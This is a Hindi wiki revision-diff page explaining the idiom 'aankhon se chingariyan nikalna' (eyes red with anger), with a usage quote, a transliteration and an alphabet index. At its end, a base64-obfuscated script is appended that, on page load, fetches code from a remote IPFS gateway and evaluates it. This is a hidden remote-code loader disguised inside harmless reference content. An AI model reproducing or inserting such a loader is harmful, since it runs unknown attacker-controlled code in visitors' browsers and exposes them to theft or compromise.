Difference between revisions of "आँखों से चिनगारियाँ निकलना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''आँखों से चिनगारियाँ निकलना''' एक प्रचलित कहावत लो...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
 
'''आँखों से चिनगारियाँ निकलना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
 
'''आँखों से चिनगारियाँ निकलना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
  
'''अर्थ'''- क्रोध से आँखें [[लालसिंह|लाल]] हो जाना।
+
'''अर्थ'''- क्रोध से आँखें लाल हो जाना।
  
'''प्रयोग'''- एकाएक उसके चेहरे का [[रंग]] बदल गया, उसकी आँखों से चिनगारियाँ निकलने लगीं। - ([[नंदा|गुलशन नंदा]])
+
'''प्रयोग'''- एकाएक उसके चेहरे का [[रंग]] बदल गया, उसकी आँखों से चिनगारियाँ निकलने लगीं। - (गुलशन नंदा)
  
  

Revision as of 11:45, 24 October 2015

aankhoan se chinagariyaan nikalana ek prachalit lokokti athava hindi muhavara hai.

arth- krodh se aankhean lal ho jana.

prayog- ekaek usake chehare ka rang badal gaya, usaki aankhoan se chinagariyaan nikalane lagian. - (gulashan nanda)


tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>